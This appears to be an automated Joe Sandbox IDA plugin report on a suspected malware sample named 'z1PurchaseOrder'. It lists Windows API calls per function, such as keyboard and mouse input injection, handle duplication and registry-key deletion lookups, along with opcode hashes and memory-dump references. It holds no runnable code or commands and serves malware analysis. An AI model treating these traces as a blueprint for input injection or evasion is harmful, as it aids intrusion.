                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1269668773-0
                                        • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                        • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                        • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                        • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                        APIs
                                          • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                          • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                        • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                        • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                        • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                        • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                        • ExitThread.KERNEL32 ref: 004156BD
                                        • __freefls@4.LIBCMT ref: 004156D9
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 4166825349-0
                                        • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                        • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                        • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                        • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                        • API String ID: 2574300362-3261711971
                                        • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                        • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                        • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                        • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                        • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                        • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                        • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00433724
                                        • GetWindowRect.USER32(00000000,?), ref: 00433757
                                        • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                        • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                        • GetWindowRect.USER32(?,?), ref: 00433814
                                        • ScreenToClient.USER32(?,?), ref: 00433842
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                        • String ID:
                                        • API String ID: 3220332590-0
                                        • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                        • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                        • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                        • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                        • String ID:
                                        • API String ID: 1612042205-0
                                        • Opcode ID: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                        • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                        • Opcode Fuzzy Hash: b8a3413a850b3e9d022a14bc02158d0a95917de16b2476bc53e0af5cb97ab780
                                        • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                        APIs
                                        • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                        • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                        • SendInput.USER32 ref: 0044C6E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$InputSend
                                        • String ID:
                                        • API String ID: 2221674350-0
                                        • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                        • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                        • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                        • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcscpy$_wcscat
                                        • String ID:
                                        • API String ID: 2037614760-0
                                        • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                        • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                        • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                        • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                        APIs
                                        • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                                        • ScreenToClient.USER32(?,?), ref: 00447C39
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                        • EndPaint.USER32(?,?), ref: 00447CD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                        • String ID:
                                        • API String ID: 4189319755-0
                                        • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                        • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                        • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                        • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                        • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID:
                                        • API String ID: 1726766782-0
                                        • Opcode ID: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                        • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                        • Opcode Fuzzy Hash: d1f4c8b32701f3515452156a35d83f93081eba70680028f938022ee8972e20b1
                                        • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                        APIs
                                        • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                        • EnableWindow.USER32(?,00000000), ref: 0044111A
                                        • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                        • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                        • EnableWindow.USER32(?,00000001), ref: 004411B3
                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                        • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                        • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                        • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                        APIs
                                        • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                        • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                        • String ID:
                                        • API String ID: 1976402638-0
                                        • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                        • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                        • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                        • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00442597
                                          • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                        • GetDesktopWindow.USER32 ref: 004425BF
                                        • GetWindowRect.USER32(00000000), ref: 004425C6
                                        • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                        • GetCursorPos.USER32(?), ref: 00442624
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                        • String ID:
                                        • API String ID: 4137160315-0
                                        • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                        • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                        • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                        • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                        APIs
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Show$MessageSend
                                        • String ID:
                                        • API String ID: 1871949834-0
                                        • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                        • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                        • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                        • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                        APIs
                                        • _memset.LIBCMT ref: 0044961A
                                        • SendMessageW.USER32 ref: 0044964A
                                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                        • _wcslen.LIBCMT ref: 004496BA
                                        • _wcslen.LIBCMT ref: 004496C7
                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                        • String ID:
                                        • API String ID: 1624073603-0
                                        • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                        • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                        • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                        • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
